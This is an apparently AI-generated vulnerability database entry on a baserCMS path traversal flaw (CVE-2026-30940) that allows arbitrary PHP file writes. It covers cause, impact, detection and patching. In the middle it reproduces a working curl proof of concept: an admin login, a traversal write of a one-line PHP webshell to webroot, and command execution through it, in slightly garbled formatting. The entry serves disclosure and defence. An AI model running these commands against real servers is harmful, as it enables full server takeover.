
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-30940 is a path traversal vulnerability in the baserCMS theme file management API that allows arbitrary file write and remote code execution (RCE). It affects baserCMS versions up to and including 5.2.2 (all 5.x releases prior to 5.2.3). The vulnerability was published on March 30–31, 2026, and patched in version 5.2.3 released March 26, 2026. It carries a CVSS v3.1 base score of 7.2 (High) (GitHub Advisory, Github Advisory).
The root cause is improper path sanitization in plugins/bc-theme-file/src/Service/BcThemeFileService.php, specifically in the getFullpath() method, which concatenates a user-supplied $path parameter directly into a file system path without normalization or boundary validation (CWE-22, CWE-73). An authenticated administrator can supply ../ sequences in the path parameter of the theme file creation API endpoint (/baser/api/admin/bc-theme-file/theme_files/add.json) to write arbitrary PHP files outside the intended theme directory — for example, into the publicly accessible webroot/ directory. When the API is enabled (USE_CORE_ADMIN_API=true), exploitation is direct via JWT-authenticated API calls; when disabled (default), exploitation requires chaining with another vulnerability such as XSS to obtain a valid session. A fully functional proof-of-concept using curl commands is publicly documented in the security advisory (GitHub Advisory).
Successful exploitation allows an authenticated administrator to write arbitrary PHP files to any directory accessible by the web server process, including the publicly reachable webroot/. This results in full remote code execution on the server, enabling an attacker to execute OS commands, exfiltrate sensitive data (confidentiality impact: High), modify or delete application files (integrity impact: High), and potentially disrupt service availability (availability impact: High). In environments where the admin panel is exposed to untrusted users or where XSS vulnerabilities exist, the effective attack surface is broader than administrator-only access (Github Advisory, baserCMS Release).
A complete, step-by-step proof-of-concept exploit — including curl commands for authentication, webshell creation via path traversal, and RCE execution — is publicly available in the official security advisory (GitHub Advisory). The EPSS score is approximately 0.151% (36th percentile), indicating a relatively low but non-negligible probability of exploitation in the near term. There is no current evidence of in-the-wild exploitation or threat actor attribution, and the vulnerability is not listed in the CISA KEV catalog as of the time of this report (Github Advisory).
USE_CORE_ADMIN_API=true) by probing the login endpoint.curl -X POST "http://target/baser/api/admin/baser-core/users/login.json" \
-H "Content-Type: application/json" \
-d '{"email":"admin@example.com","password":"password"}'curl -X POST "http://target/baser/api/admin/bc-theme-file/theme_files/add.json" \
-H "Authorization: Bearer <TOKEN>" \
-H "Content-Type: application/json" \
-d '{
"theme": "BcThemeSample",
"plugin": "",
"type": "layout",
"path": "../../../../webroot/",
"base_name": "shell",
"ext": "php",
"contents": "<?php system($_GET[\"cmd\"]); ?>"
}'curl "http://target/shell.php?cmd=id"/baser/api/admin/bc-theme-file/theme_files/add.json with path parameters containing ../ sequences; HTTP GET requests to unexpected .php files in the webroot (e.g., /shell.php, /cmd.php) from external IPs.webroot/ or other directories outside the theme directory (e.g., plugins/BcThemeSample/templates/); file timestamps inconsistent with normal deployment activity.../ in JSON body parameters; subsequent GET requests to newly created PHP files with query parameters like ?cmd= or ?c=.id, whoami, bash, curl, wget) following access to unexpected PHP files in the webroot.
(GitHub Advisory)Upgrade baserCMS to version 5.2.3 or later, which patches this vulnerability by implementing proper path boundary validation using canonicalized paths (e.g., realpath()) to ensure file writes remain within the theme base directory (baserCMS Release, basercms.net). As an interim workaround, disable the admin API (USE_CORE_ADMIN_API=false, which is the default) to prevent direct external exploitation; note that this does not fully mitigate the risk if XSS or other vulnerabilities exist that could be chained. Additionally, restrict administrative access to trusted users only and monitor for unexpected PHP file creation in the webroot directory (Github Advisory).
The vulnerability was reported by security researcher kaminuma and disclosed via the baserCMS GitHub security advisory on March 30, 2026. A Bluesky post from the CyberHub blog noted the vulnerability shortly after disclosure. No major media coverage or notable researcher commentary beyond the official advisory has been identified at this time (Github Advisory).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."